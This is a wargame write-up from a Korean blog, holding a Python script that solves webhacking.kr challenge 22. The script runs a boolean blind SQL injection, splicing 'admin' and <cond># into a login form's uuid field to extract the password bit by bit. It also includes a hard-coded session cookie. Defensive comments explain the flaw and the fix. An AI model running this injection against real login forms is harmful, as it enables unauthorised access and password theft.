war game/webhacking.kr
[webhacking.kr]22번 blind sql injection binary search
shnec
2017. 1. 30. 04:36
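"""Solver notes for the webhacking.kr bonus-2 wargame challenge (boolean-based blind SQL injection).

The original listing was collapsed onto a single line; the indentation below is
reconstructed, so the exact placement of the progress ``print`` calls is a best
guess (once per recovered character).

Defensive reading: the login handler apparently splices the ``uuid`` form field
into a quoted SQL string, and the page shows 'Wrong!' only when the injected
condition is false. That one-bit difference is the whole leak. Binding ``uuid``
as a query parameter closes it.
"""
import http.client
import urllib.parse  # plain `import urllib` only worked because http.client happens to load urllib.parse
import math


def fetch_string(statement):
    """Recover the value of the SQL expression *statement*, one bit per request.

    For each of 32 character positions the function asks eight true/false
    questions (``ord(mid(statement, i, 1)) & 2**x`` for x = 0..7) through
    ``test`` and reassembles the byte from the answers. That is 256 requests
    in total, so the per-account request volume is itself a detection signal.

    Args:
        statement: SQL expression or column name to read (the script uses 'pw').

    Returns:
        A 32-character string. The length is hard-coded rather than queried,
        so positions past the end of the real value presumably decode as
        NUL characters (TODO confirm against the backend's ``ord('')``).
    """
    # skip fetching length
    length = 32
    ret = ''
    for i in range(1, length + 1):
        # Bits are collected least-significant first, hence the reversal below.
        tmp = ''
        for x in range(8):
            tmp += '1' if test('ord(mid(%s,%d,1))&%d' % (statement, i, 2**x)) else '0'
        print(tmp[::-1])
        print(tmp)
        ret += chr(int(tmp[::-1], 2))
        print(ret)
    return ret


def test(cond):
    """Send one login attempt carrying *cond* and report whether it evaluated true.

    The condition is URL-quoted and appended to the ``uuid`` field after a
    closing quote; the trailing ``%23`` (``#``) comments out the rest of the
    server-side query.

    Args:
        cond: SQL boolean/integer expression to evaluate server-side.

    Returns:
        True when the response body does not contain 'Wrong!'.
    """
    c = http.client.HTTPConnection('webhacking.kr')
    head = {'Host': 'webhacking.kr'}
    head['Upgrade-Insecure-Requests'] = '1'
    head['Content-Type'] = 'application/x-www-form-urlencoded'
    # NOTE(review): a session identifier is hard-coded here and was published
    # with the post; treat it as burned. It also travels over plain HTTP, so
    # anyone on the path can read it.
    head['Cookie'] = 'id=rbc; PHPSESSID=7e74a61eb46338352194ab8d2d1535db'
    _body = 'uuid=admin%27+and+{}%23&pw=123'.format(urllib.parse.quote(cond))
    try:
        c.request('POST', '/challenge/bonus/bonus-2/index.php', headers=head, body=_body)
        res = c.getresponse().read().decode()
    finally:
        # The original never closed the connection, leaking one socket per probe.
        c.close()
    return 'Wrong!' not in res


# Guarded so that importing this file does not fire 256 requests as a side effect.
if __name__ == '__main__':
    fetch_string('pw')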